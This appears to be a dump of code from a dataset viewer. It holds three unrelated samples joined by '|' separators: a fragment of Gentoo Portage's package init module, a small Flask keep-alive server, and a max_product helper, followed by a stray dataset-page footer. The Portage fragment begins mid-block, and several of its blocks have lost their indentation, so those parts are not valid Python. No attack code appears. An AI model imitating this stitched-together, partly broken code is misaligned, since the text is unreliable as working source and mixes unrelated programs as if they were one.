sys.stderr.write("!!! You might consider starting python with verbose flags to see what has\n")
sys.stderr.write("!!! gone wrong. Here is the information we got for this exception:\n")
sys.stderr.write(" "+str(e)+"\n\n");
raise
try:
import portage.proxy.lazyimport
import portage.proxy as proxy
proxy.lazyimport.lazyimport(globals(),
'portage.cache.cache_errors:CacheError',
'portage.checksum',
'portage.checksum:perform_checksum,perform_md5,prelink_capable',
'portage.cvstree',
'portage.data',
'portage.data:lchown,ostype,portage_gid,portage_uid,secpass,' + \
'uid,userland,userpriv_groups,wheelgid',
'portage.dbapi',
'portage.dbapi.bintree:bindbapi,binarytree',
'portage.dbapi.cpv_expand:cpv_expand',
'portage.dbapi.dep_expand:dep_expand',
'portage.dbapi.porttree:close_portdbapi_caches,FetchlistDict,' + \
'portagetree,portdbapi',
'portage.dbapi.vartree:dblink,merge,unmerge,vardbapi,vartree',
'portage.dbapi.virtual:fakedbapi',
'portage.dep',
'portage.dep:best_match_to_list,dep_getcpv,dep_getkey,' + \
'flatten,get_operator,isjustname,isspecific,isvalidatom,' + \
'match_from_list,match_to_list',
'portage.dep.dep_check:dep_check,dep_eval,dep_wordreduce,dep_zapdeps',
'portage.eclass_cache',
'portage.elog',
'portage.exception',
'portage.getbinpkg',
'portage.locks',
'portage.locks:lockdir,lockfile,unlockdir,unlockfile',
'portage.mail',
'portage.manifest:Manifest',
'portage.output',
'portage.output:bold,colorize',
'portage.package.ebuild.doebuild:doebuild,' + \
'doebuild_environment,spawn,spawnebuild',
'portage.package.ebuild.config:autouse,best_from_dict,' + \
'check_config_instance,config',
'portage.package.ebuild.deprecated_profile_check:' + \
'deprecated_profile_check',
'portage.package.ebuild.digestcheck:digestcheck',
'portage.package.ebuild.digestgen:digestgen',
'portage.package.ebuild.fetch:fetch',
'portage.package.ebuild.getmaskingreason:getmaskingreason',
'portage.package.ebuild.getmaskingstatus:getmaskingstatus',
'portage.package.ebuild.prepare_build_dirs:prepare_build_dirs',
'portage.process',
'portage.process:atexit_register,run_exitfuncs',
'portage.update:dep_transform,fixdbentries,grab_updates,' + \
'parse_updates,update_config_files,update_dbentries,' + \
'update_dbentry',
'portage.util',
'portage.util:atomic_ofstream,apply_secpass_permissions,' + \
'apply_recursive_permissions,dump_traceback,getconfig,' + \
'grabdict,grabdict_package,grabfile,grabfile_package,' + \
'map_dictlist_vals,new_protect_filename,normalize_path,' + \
'pickle_read,pickle_write,stack_dictlist,stack_dicts,' + \
'stack_lists,unique_array,varexpand,writedict,writemsg,' + \
'writemsg_stdout,write_atomic',
'portage.util.digraph:digraph',
'portage.util.env_update:env_update',
'portage.util.ExtractKernelVersion:ExtractKernelVersion',
'portage.util.listdir:cacheddir,listdir',
'portage.util.movefile:movefile',
'portage.util.mtimedb:MtimeDB',
'portage.versions',
'portage.versions:best,catpkgsplit,catsplit,cpv_getkey,' + \
'cpv_getkey@getCPFromCPV,endversion_keys,' + \
'suffix_value@endversion,pkgcmp,pkgsplit,vercmp,ververify',
'portage.xpak',
'subprocess',
'time',
)
try:
from collections import OrderedDict
except ImportError:
proxy.lazyimport.lazyimport(globals(),
'portage.cache.mappings:OrderedDict')
import portage.const
from portage.const import VDB_PATH, PRIVATE_PATH, CACHE_PATH, DEPCACHE_PATH, \
USER_CONFIG_PATH, MODULES_FILE_PATH, CUSTOM_PROFILE_PATH, PORTAGE_BASE_PATH, \
PORTAGE_BIN_PATH, PORTAGE_PYM_PATH, PROFILE_PATH, LOCALE_DATA_PATH, \
EBUILD_SH_BINARY, SANDBOX_BINARY, BASH_BINARY, \
MOVE_BINARY, PRELINK_BINARY, WORLD_FILE, MAKE_CONF_FILE, MAKE_DEFAULTS_FILE, \
DEPRECATED_PROFILE_FILE, USER_VIRTUALS_FILE, EBUILD_SH_ENV_FILE, \
INVALID_ENV_FILE, CUSTOM_MIRRORS_FILE, CONFIG_MEMORY_FILE,\
INCREMENTALS, EAPI, MISC_SH_BINARY, REPO_NAME_LOC, REPO_NAME_FILE
except ImportError as e:
sys.stderr.write("\n\n")
sys.stderr.write("!!! Failed to complete portage imports. There are internal modules for\n")
sys.stderr.write("!!! portage and failure here indicates that you have a problem with your\n")
sys.stderr.write("!!! installation of portage. Please try a rescue portage located in the\n")
sys.stderr.write("!!! portage tree under '/usr/portage/sys-apps/portage/files/' (default).\n")
sys.stderr.write("!!! There is a README.RESCUE file that details the steps required to perform\n")
sys.stderr.write("!!! a recovery of portage.\n")
sys.stderr.write(" "+str(e)+"\n\n")
raise
if sys.hexversion >= 0x3000000:
	# Python 3: alias the Python 2 names this module still uses.
	basestring = str
	long = int
# We use utf_8 encoding everywhere. Previously, we used
# sys.getfilesystemencoding() for the 'merge' encoding, but that had
# various problems:
#
# 1) If the locale is ever changed then it can cause orphan files due
# to changed character set translation.
#
# 2) Ebuilds typically install files with utf_8 encoded file names,
# and then portage would be forced to rename those files to match
# sys.getfilesystemencoding(), possibly breaking things.
#
# 3) Automatic translation between encodings can lead to nonsensical
# file names when the source encoding is unknown by portage.
#
# 4) It's inconvenient for ebuilds to convert the encodings of file
# names to match the current locale, and upstreams typically encode
# file names with utf_8 encoding.
#
# So, instead of relying on sys.getfilesystemencoding(), we avoid the above
# problems by using a constant utf_8 'merge' encoding for all locales, as
# discussed in bug #382199 and bug #381509.
_encodings = {
'content' : 'utf_8',
'fs' : 'utf_8',
'merge' : 'utf_8',
'repo.content' : 'utf_8',
'stdio' : 'utf_8',
}
if sys.hexversion >= 0x3000000:
def _unicode_encode(s, encoding=_encodings['content'], errors='backslashreplace'):
if isinstance(s, str):
s = s.encode(encoding, errors)
return s
def _unicode_decode(s, encoding=_encodings['content'], errors='replace'):
if isinstance(s, bytes):
s = str(s, encoding=encoding, errors=errors)
return s
else:
def _unicode_encode(s, encoding=_encodings['content'], errors='backslashreplace'):
if isinstance(s, unicode):
s = s.encode(encoding, errors)
return s
def _unicode_decode(s, encoding=_encodings['content'], errors='replace'):
if isinstance(s, bytes):
s = unicode(s, encoding=encoding, errors=errors)
return s
class _unicode_func_wrapper(object):
	"""
	Wraps a function, converts arguments from unicode to bytes,
	and return values to unicode from bytes. Function calls
	will raise UnicodeEncodeError if an argument fails to be
	encoded with the required encoding. Return values that
	are single strings are decoded with errors='replace'. Return
	values that are lists of strings are decoded with errors='strict'
	and elements that fail to be decoded are omitted from the returned
	list.
	"""
	__slots__ = ('_func', '_encoding')

	def __init__(self, func, encoding=_encodings['fs']):
		# func: the callable (typically from os/shutil) being wrapped
		# encoding: charset for encoding args / decoding return values
		self._func = func
		self._encoding = encoding

	def __call__(self, *args, **kwargs):
		encoding = self._encoding
		# encode all arguments strictly: a bad argument raises rather than
		# silently producing a corrupted path
		wrapped_args = [_unicode_encode(x, encoding=encoding, errors='strict')
			for x in args]
		if kwargs:
			wrapped_kwargs = dict(
				(k, _unicode_encode(v, encoding=encoding, errors='strict'))
				for k, v in kwargs.items())
		else:
			wrapped_kwargs = {}
		rval = self._func(*wrapped_args, **wrapped_kwargs)
		# Don't use isinstance() since we don't want to convert subclasses
		# of tuple such as posix.stat_result in Python >=3.2.
		if rval.__class__ in (list, tuple):
			# strict decode; undecodable elements are dropped (see class doc)
			decoded_rval = []
			for x in rval:
				try:
					x = _unicode_decode(x, encoding=encoding, errors='strict')
				except UnicodeDecodeError:
					pass
				else:
					decoded_rval.append(x)
			# preserve the container type of the wrapped function's result
			if isinstance(rval, tuple):
				rval = tuple(decoded_rval)
			else:
				rval = decoded_rval
		else:
			rval = _unicode_decode(rval, encoding=encoding, errors='replace')
		return rval
class _unicode_module_wrapper(object):
	"""
	Wraps a module and wraps all functions with _unicode_func_wrapper.
	"""
	__slots__ = ('_mod', '_encoding', '_overrides', '_cache')

	def __init__(self, mod, encoding=_encodings['fs'], overrides=None, cache=True):
		# use object.__setattr__ because __getattribute__ is overridden below
		object.__setattr__(self, '_mod', mod)
		object.__setattr__(self, '_encoding', encoding)
		object.__setattr__(self, '_overrides', overrides)
		if cache:
			cache = {}
		else:
			cache = None
		object.__setattr__(self, '_cache', cache)

	def __getattribute__(self, attr):
		# Resolve *attr* on the wrapped module, wrapping callables and
		# submodules on first access and memoizing the result when caching
		# is enabled.
		cache = object.__getattribute__(self, '_cache')
		if cache is not None:
			result = cache.get(attr)
			if result is not None:
				return result
		result = getattr(object.__getattribute__(self, '_mod'), attr)
		encoding = object.__getattribute__(self, '_encoding')
		overrides = object.__getattribute__(self, '_overrides')
		override = None
		if overrides is not None:
			# overrides are keyed by id() of the original attribute
			override = overrides.get(id(result))
		if override is not None:
			result = override
		elif isinstance(result, type):
			# classes pass through unwrapped
			pass
		elif type(result) is types.ModuleType:
			# wrap submodules recursively with the same settings
			result = _unicode_module_wrapper(result,
				encoding=encoding, overrides=overrides)
		elif hasattr(result, '__call__'):
			result = _unicode_func_wrapper(result, encoding=encoding)
		if cache is not None:
			cache[attr] = result
		return result
import os as _os
# These os functions keep their native (unwrapped) behavior when accessed
# through the unicode module wrapper below.
_os_overrides = {
	id(_os.fdopen) : _os.fdopen,
	id(_os.popen) : _os.popen,
	id(_os.read) : _os.read,
	id(_os.system) : _os.system,
}

try:
	_os_overrides[id(_os.mkfifo)] = _os.mkfifo
except AttributeError:
	pass # Jython

if hasattr(_os, 'statvfs'):
	_os_overrides[id(_os.statvfs)] = _os.statvfs

# Module-wide 'os' and 'shutil' are unicode-wrapped versions of the stdlib
# modules; _os_merge uses the 'merge' encoding for file-merge operations.
os = _unicode_module_wrapper(_os, overrides=_os_overrides,
	encoding=_encodings['fs'])
_os_merge = _unicode_module_wrapper(_os,
	encoding=_encodings['merge'], overrides=_os_overrides)

import shutil as _shutil
shutil = _unicode_module_wrapper(_shutil, encoding=_encodings['fs'])
# Imports below this point rely on the above unicode wrapper definitions.
try:
__import__('selinux')
import portage._selinux
selinux = _unicode_module_wrapper(_selinux,
encoding=_encodings['fs'])
_selinux_merge = _unicode_module_wrapper(_selinux,
encoding=_encodings['merge'])
except (ImportError, OSError) as e:
if isinstance(e, OSError):
sys.stderr.write("!!! SELinux not loaded: %s\n" % str(e))
del e
_selinux = None
selinux = None
_selinux_merge = None
# ===========================================================================
# END OF IMPORTS -- END OF IMPORTS -- END OF IMPORTS -- END OF IMPORTS -- END
# ===========================================================================
# Resolved interpreter and portage install paths used when spawning helpers.
_python_interpreter = os.path.realpath(sys.executable)
_bin_path = PORTAGE_BIN_PATH
_pym_path = PORTAGE_PYM_PATH

# Api consumers included in portage should set this to True.
_internal_warnings = False

_sync_disabled_warnings = False
def _shell_quote(s):
"""
Quote a string in double-quotes and use backslashes to
escape any backslashes, double-quotes, dollar signs, or
backquotes in the string.
"""
for letter in "\\\"$`":
if letter in s:
s = s.replace(letter, "\\" + letter)
return "\"%s\"" % s
# chflags support is only wired up on FreeBSD; everywhere else it stays None.
bsd_chflags = None

if platform.system() in ('FreeBSD',):
	class bsd_chflags(object):
		"""Thin wrapper around the FreeBSD chflags(1) command."""

		@classmethod
		def chflags(cls, path, flags, opts=""):
			# Invoke `chflags [opts] <octal flags> <path>` and raise OSError
			# (EPERM) with the command output on failure.
			cmd = ['chflags']
			if opts:
				cmd.append(opts)
			cmd.append('%o' % (flags,))
			cmd.append(path)
			encoding = _encodings['fs']
			if sys.hexversion < 0x3000000 or sys.hexversion >= 0x3020000:
				# Python 3.1 does not support bytes in Popen args.
				cmd = [_unicode_encode(x, encoding=encoding, errors='strict')
					for x in cmd]
			proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
				stderr=subprocess.STDOUT)
			output = proc.communicate()[0]
			status = proc.wait()
			if os.WIFEXITED(status) and os.WEXITSTATUS(status) == os.EX_OK:
				return
			# Try to generate an ENOENT error if appropriate.
			if 'h' in opts:
				_os_merge.lstat(path)
			else:
				_os_merge.stat(path)
			# Make sure the binary exists.
			if not portage.process.find_binary('chflags'):
				raise portage.exception.CommandNotFound('chflags')
			# Now we're not sure exactly why it failed or what
			# the real errno was, so just report EPERM.
			output = _unicode_decode(output, encoding=encoding)
			e = OSError(errno.EPERM, output)
			e.errno = errno.EPERM
			e.filename = path
			e.message = output
			raise e

		@classmethod
		def lchflags(cls, path, flags):
			# Like chflags but acts on the symlink itself (-h).
			return cls.chflags(path, flags, opts='-h')
def load_mod(name):
	"""Import the dotted *name* and return the named module/attribute.

	E.g. load_mod("a.b.c") imports package "a.b" and returns a.b.c.
	"""
	parent = ".".join(name.split(".")[:-1])
	result = __import__(parent)
	for part in name.split('.')[1:]:
		result = getattr(result, part)
	return result
def getcwd():
	"this fixes situations where the current directory doesn't exist"
	try:
		cwd = os.getcwd()
	except OSError: #dir doesn't exist
		# fall back to the filesystem root, which always exists
		os.chdir("/")
		cwd = "/"
	return cwd
# normalize the process cwd once at import time
getcwd()
def abssymlink(symlink, target=None):
	"This reads symlinks, resolving the relative symlinks, and returning the absolute."
	link = target if target is not None else os.readlink(symlink)
	if link[0] != '/':
		# relative link: anchor it at the symlink's own directory
		link = os.path.dirname(symlink) + "/" + link
	return os.path.normpath(link)
# presumably a counter/flag consulted by doebuild's manifest checks -- the
# usage is outside this chunk; TODO confirm
_doebuild_manifest_exempt_depend = 0

# EAPI strings that are recognized but experimental / deprecated
_testing_eapis = frozenset(["4-python", "4-slot-abi", "5-progress", "5-hdepend"])
_deprecated_eapis = frozenset(["4_pre1", "3_pre2", "3_pre1", "5_pre1", "5_pre2"])

def _eapi_is_deprecated(eapi):
	"""Return True if *eapi* is one of the deprecated EAPI strings."""
	return eapi in _deprecated_eapis
def eapi_is_supported(eapi):
	"""Return True if this portage can process ebuilds with the given EAPI.

	Deprecated and testing EAPIs are deliberately reported as supported;
	otherwise the EAPI must parse as a non-negative integer no greater than
	portage.const.EAPI.
	"""
	if not isinstance(eapi, basestring):
		# Only call str() when necessary since with python2 it
		# can trigger UnicodeEncodeError if EAPI is corrupt.
		eapi = str(eapi)
	eapi = eapi.strip()
	if _eapi_is_deprecated(eapi):
		return True
	if eapi in _testing_eapis:
		return True
	try:
		eapi = int(eapi)
	except ValueError:
		# non-numeric and not in the known sets above -> unsupported
		eapi = -1
	if eapi < 0:
		return False
	return eapi <= portage.const.EAPI
# This pattern is specified by PMS section 7.3.1.
_pms_eapi_re = re.compile(r"^[ \t]*EAPI=(['\"]?)([A-Za-z0-9+_.-]*)\1[ \t]*([ \t]#.*)?$")
_comment_or_blank_line = re.compile(r"^\s*(#.*)?$")
def _parse_eapi_ebuild_head(f):
eapi = None
eapi_lineno = None
lineno = 0
for line in f:
lineno += 1
m = _comment_or_blank_line.match(line)
if m is None:
eapi_lineno = lineno
m = _pms_eapi_re.match(line)
if m is not None:
eapi = m.group(2)
break
return (eapi, eapi_lineno)
def _movefile(src, dest, **kwargs):
	"""Calls movefile and raises a PortageException if an error occurs."""
	# movefile signals failure by returning None
	if movefile(src, dest, **kwargs) is None:
		raise portage.exception.PortageException(
			"mv '%s' '%s'" % (src, dest))
# Ordered metadata keys for the auxiliary ebuild-metadata cache; the UNUSED_*
# entries are placeholders that keep positions stable.
auxdbkeys = (
	'DEPEND', 'RDEPEND', 'SLOT', 'SRC_URI',
	'RESTRICT', 'HOMEPAGE', 'LICENSE', 'DESCRIPTION',
	'KEYWORDS', 'INHERITED', 'IUSE', 'REQUIRED_USE',
	'PDEPEND', 'PROVIDE', 'EAPI',
	'PROPERTIES', 'DEFINED_PHASES', 'HDEPEND', 'UNUSED_04',
	'UNUSED_03', 'UNUSED_02', 'UNUSED_01',
)
auxdbkeylen=len(auxdbkeys)
def portageexit():
	"""Exit hook: close the portdbapi metadata caches."""
	close_portdbapi_caches()
class _trees_dict(dict):
__slots__ = ('_running_eroot', '_target_eroot',)
def __init__(self, *pargs, **kargs):
dict.__init__(self, *pargs, **kargs)
self._running_eroot = None
self._target_eroot = None
def create_trees(config_root=None, target_root=None, trees=None, env=None,
	eprefix=None):
	"""Build (or rebuild) the _trees_dict of vartree/porttree/bintree per root.

	When ROOT != "/", a second, nearly-env-free config is created for the
	running root so environment overrides only affect the target root.
	Reuses *trees* if given (after closing its portdbapi caches).
	"""
	if trees is not None:
		# clean up any existing portdbapi instances
		for myroot in trees:
			portdb = trees[myroot]["porttree"].dbapi
			portdb.close_caches()
			portdbapi.portdbapi_instances.remove(portdb)
			del trees[myroot]["porttree"], myroot, portdb
	if trees is None:
		trees = _trees_dict()
	elif not isinstance(trees, _trees_dict):
		# caller passed a normal dict or something,
		# but we need a _trees_dict instance
		trees = _trees_dict(trees)
	if env is None:
		env = os.environ
	settings = config(config_root=config_root, target_root=target_root,
		env=env, eprefix=eprefix)
	settings.lock()
	trees._target_eroot = settings['EROOT']
	myroots = [(settings['EROOT'], settings)]
	if settings["ROOT"] == "/":
		trees._running_eroot = trees._target_eroot
	else:
		# When ROOT != "/" we only want overrides from the calling
		# environment to apply to the config that's associated
		# with ROOT != "/", so pass a nearly empty dict for the env parameter.
		clean_env = {}
		for k in ('PATH', 'PORTAGE_GRPNAME', 'PORTAGE_USERNAME',
			'SSH_AGENT_PID', 'SSH_AUTH_SOCK', 'TERM',
			'ftp_proxy', 'http_proxy', 'no_proxy',
			'__PORTAGE_TEST_HARDLINK_LOCKS'):
			v = settings.get(k)
			if v is not None:
				clean_env[k] = v
		settings = config(config_root=None, target_root="/",
			env=clean_env, eprefix=eprefix)
		settings.lock()
		trees._running_eroot = settings['EROOT']
		myroots.append((settings['EROOT'], settings))
	# register lazily-constructed trees for each root
	for myroot, mysettings in myroots:
		trees[myroot] = portage.util.LazyItemsDict(trees.get(myroot, {}))
		trees[myroot].addLazySingleton("virtuals", mysettings.getvirtuals)
		trees[myroot].addLazySingleton(
			"vartree", vartree, categories=mysettings.categories,
			settings=mysettings)
		trees[myroot].addLazySingleton("porttree",
			portagetree, settings=mysettings)
		trees[myroot].addLazySingleton("bintree",
			binarytree, pkgdir=mysettings["PKGDIR"], settings=mysettings)
	return trees
if VERSION == 'HEAD':
	class _LazyVersion(proxy.objectproxy.ObjectProxy):
		"""Resolve the live version from `git describe` on first use.

		Only constructed when VERSION is the literal 'HEAD' (i.e. a git
		checkout); otherwise this whole block is skipped.
		"""
		def _get_target(self):
			global VERSION
			if VERSION is not self:
				# already resolved by an earlier call
				return VERSION
			if os.path.isdir(os.path.join(PORTAGE_BASE_PATH, '.git')):
				encoding = _encodings['fs']
				# prints the describe output, then "modified" plus the HEAD
				# commit timestamp when the working tree has modifications
				cmd = [BASH_BINARY, "-c", ("cd %s ; git describe --tags || exit $? ; " + \
					"if [ -n \"`git diff-index --name-only --diff-filter=M HEAD`\" ] ; " + \
					"then echo modified ; git rev-list --format=%%ct -n 1 HEAD ; fi ; " + \
					"exit 0") % _shell_quote(PORTAGE_BASE_PATH)]
				if sys.hexversion < 0x3000000 or sys.hexversion >= 0x3020000:
					# Python 3.1 does not support bytes in Popen args.
					cmd = [_unicode_encode(x, encoding=encoding, errors='strict')
						for x in cmd]
				proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
					stderr=subprocess.STDOUT)
				output = _unicode_decode(proc.communicate()[0], encoding=encoding)
				status = proc.wait()
				if os.WIFEXITED(status) and os.WEXITSTATUS(status) == os.EX_OK:
					output_lines = output.splitlines()
					if output_lines:
						version_split = output_lines[0].split('-')
						if version_split:
							VERSION = version_split[0].lstrip('v')
							patchlevel = False
							if len(version_split) > 1:
								patchlevel = True
								VERSION = "%s_p%s" %(VERSION, version_split[1])
							if len(output_lines) > 1 and output_lines[1] == 'modified':
								# encode "modified" as an extra _p suffix of
								# seconds elapsed since the HEAD commit
								head_timestamp = None
								if len(output_lines) > 3:
									try:
										head_timestamp = long(output_lines[3])
									except ValueError:
										pass
								timestamp = long(time.time())
								if head_timestamp is not None and timestamp > head_timestamp:
									timestamp = timestamp - head_timestamp
								if not patchlevel:
									VERSION = "%s_p0" % (VERSION,)
								VERSION = "%s_p%d" % (VERSION, timestamp)
							return VERSION
			# not a git checkout (or git failed): stay at 'HEAD'
			VERSION = 'HEAD'
			return VERSION
	VERSION = _LazyVersion()
# The presence of _legacy_globals_constructed in globals() means this module
# has been reloaded: close out any portdbapi instances constructed by the
# previous incarnation so their caches are flushed and they do not leak.
if "_legacy_globals_constructed" in globals():
	# The module has been reloaded, so perform any relevant cleanup
	# and prevent memory leaks.
	if "db" in _legacy_globals_constructed:
		try:
			db
		except NameError:
			pass
		else:
			if isinstance(db, dict) and db:
				for _x in db.values():
					try:
						if "porttree" in _x.lazy_items:
							# Still a lazy placeholder, never instantiated;
							# nothing to close.
							continue
					except (AttributeError, TypeError):
						continue
					try:
						_x = _x["porttree"].dbapi
					except (AttributeError, KeyError):
						continue
					if not isinstance(_x, portdbapi):
						continue
					# Flush caches and deregister the stale instance.
					_x.close_caches()
					try:
						portdbapi.portdbapi_instances.remove(_x)
					except ValueError:
						pass
				del _x
class _LegacyGlobalProxy(proxy.objectproxy.ObjectProxy):
	"""
	Proxy that stands in for a deprecated module-level global and
	resolves the real object only when it is first used.
	"""

	__slots__ = ('_name',)

	def __init__(self, name):
		proxy.objectproxy.ObjectProxy.__init__(self)
		# ObjectProxy intercepts normal attribute assignment, so store
		# the global's name via object.__setattr__.
		object.__setattr__(self, '_name', name)

	def _get_target(self):
		# Deferred import avoids a circular dependency at module load.
		from portage._legacy_globals import _get_legacy_global
		return _get_legacy_global(object.__getattribute__(self, '_name'))
# Names of the deprecated module-level globals.  Each one is published as a
# lazy proxy that materializes the real object on first use.
_legacy_global_var_names = ("archlist", "db", "features",
	"groups", "mtimedb", "mtimedbfile", "pkglines",
	"portdb", "profiledir", "root", "selinux_enabled",
	"settings", "thirdpartymirrors")

globals().update((name, _LegacyGlobalProxy(name))
	for name in _legacy_global_var_names)

# Records which legacy globals have actually been constructed, so that a
# module reload can clean them up (see the reload check above).
_legacy_globals_constructed = set()
def _disable_legacy_globals():
	"""
	This deletes the ObjectProxy instances that are used
	for lazy initialization of legacy global variables.
	The purpose of deleting them is to prevent new code
	from referencing these deprecated variables.
	"""
	for name in _legacy_global_var_names:
		# pop() with a default tolerates names that were never installed
		# or were already removed.
		globals().pop(name, None)
|
from flask import Flask
from threading import Thread

# Minimal web server whose only purpose is answering uptime pings so the
# hosting platform keeps this process alive.
app = Flask('')


@app.route('/')
def home():
    # Plain 200 response; the third tuple element (headers) is left empty.
    return ("I'm simping :}", 200, None)


def run():
    # Bind on all interfaces so external health checks can reach us.
    app.run(host='0.0.0.0', port=8081)


def keep_alive():
    # Serve in a background thread so the caller's main loop keeps running.
    Thread(target=run).start()
|
def max_product(nums):
    """Return the maximum product of any two distinct elements of *nums*.

    Returns 0 when fewer than two elements are given, matching the old
    implementation (its zero-initialized trackers multiplied to 0).

    Bug fixed: the previous version tracked only the two largest values,
    initialized to 0, so it returned wrong results whenever negatives were
    involved -- e.g. [-10, -10, 1] should give 100 (product of the two most
    negative values), and [-1, 5] should give -5, but both returned 0.
    """
    if len(nums) < 2:
        # Preserve the original behavior for degenerate inputs.
        return 0
    ordered = sorted(nums)
    # The best pair is either the two largest values or the two smallest
    # (two large negatives can multiply to a large positive).
    return max(ordered[-1] * ordered[-2], ordered[0] * ordered[1])
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.